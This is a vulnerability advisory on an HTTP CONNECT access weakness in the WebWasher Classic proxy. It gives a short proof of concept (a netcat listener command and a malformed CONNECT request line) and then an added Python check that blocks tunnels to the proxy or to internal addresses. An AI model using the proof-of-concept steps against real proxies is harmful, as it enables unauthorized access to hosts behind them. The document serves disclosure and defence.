WebWasher Classic HTTP CONNECT Unauthorized Access Weakness

An exploit is not required.

The following proof of concept is available:
1) Start a netcat listener on the WebWasher system:
netcat -L -p 99 -s < hallo.txt
2) Connect to the WebWasher proxy port (default 8080/tcp).
3) Enter the command "CONNECT HTTP/1.0".

As a result, the content of hallo.txt is returned over the proxy connection.
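
A defensive counterpart to the proof of concept above, as an added example that is not WebWasher code and not part of the original advisory: a check a proxy can apply to each CONNECT request line so that tunnels to the proxy host itself or to internal addresses are refused. The port allowlist (443), the injected `resolve` function, the `proxy_addrs` parameter and all sample hosts and addresses are assumptions of this example.

```python
import ipaddress
import re

# Assumed policy, not taken from the advisory: tunnel only to these ports.
ALLOWED_PORTS = {443}

_CONNECT_RE = re.compile(
    r"^CONNECT\s+(\[[0-9A-Fa-f:.]+\]|[^\s:]+):(\d{1,5})\s+HTTP/1\.[01]$")

def _is_internal(addr):
    ip = ipaddress.ip_address(addr)
    # Judge IPv4-mapped IPv6 (::ffff:127.0.0.1) by the embedded IPv4 address.
    mapped = getattr(ip, "ipv4_mapped", None)
    if mapped is not None:
        ip = mapped
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_unspecified or ip.is_multicast or ip.is_reserved)

def connect_allowed(request_line, resolve, proxy_addrs=()):
    """Return (allowed, reason) for one CONNECT request line.

    resolve(host) -> list of IP strings; injected so the check runs offline.
    proxy_addrs: the proxy's own routable addresses (hypothetical parameter).
    """
    m = _CONNECT_RE.match(request_line.strip())
    if not m:
        return False, "malformed CONNECT request"
    host, port = m.group(1).strip("[]"), int(m.group(2))
    if port not in ALLOWED_PORTS:
        return False, "port %d not allowed" % port
    try:
        addrs = [str(ipaddress.ip_address(host))]   # IP literal
    except ValueError:
        addrs = resolve(host)                       # hostname
    if not addrs:
        return False, "unresolvable"
    for a in addrs:
        # Check every resolved address, not just the first one.
        if a in proxy_addrs or _is_internal(a):
            return False, "target %s is the proxy or internal" % a
    return True, "ok"

if __name__ == "__main__":
    # Constructed resolver table and request lines, for illustration only.
    table = {"localhost": ["127.0.0.1"], "example.com": ["93.184.216.34"]}
    for line in ("CONNECT localhost:443 HTTP/1.0", "CONNECT 127.0.0.1:99 HTTP/1.0",
                 "CONNECT example.com:443 HTTP/1.0"):
        print(line, "->", connect_allowed(line, lambda h: table.get(h, [])))
```

The proxy should open the tunnel to the address that passed the check rather than resolving the hostname a second time, so the decision and the connection refer to the same target.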


